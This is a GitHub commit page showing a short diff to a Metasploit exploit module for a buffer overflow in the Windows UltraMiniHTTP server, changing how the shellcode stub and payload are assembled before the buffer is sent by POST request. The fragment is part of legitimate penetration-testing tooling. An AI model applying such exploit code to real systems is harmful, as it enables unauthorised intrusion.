We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent fdd0d91 commit c9f0885Copy full SHA for c9f0885
modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -160,8 +160,9 @@ def exploit
160
# we re-encode, including the thread creation stuff and the chosen payload
161
# as we don't currently have the ability to "prepend raw" stuff to the front
162
# of the buffer prior to encoding.
163
- buf << encode_shellcode_stub(new_thread + payload.encoded)
164
-
+ buf << encode_shellcode_stub(new_thread)
+ buf << payload.encoded
165
+
166
print_status("Sending buffer...")
167
send_request_cgi({
168
'method' => 'POST',
0 commit comments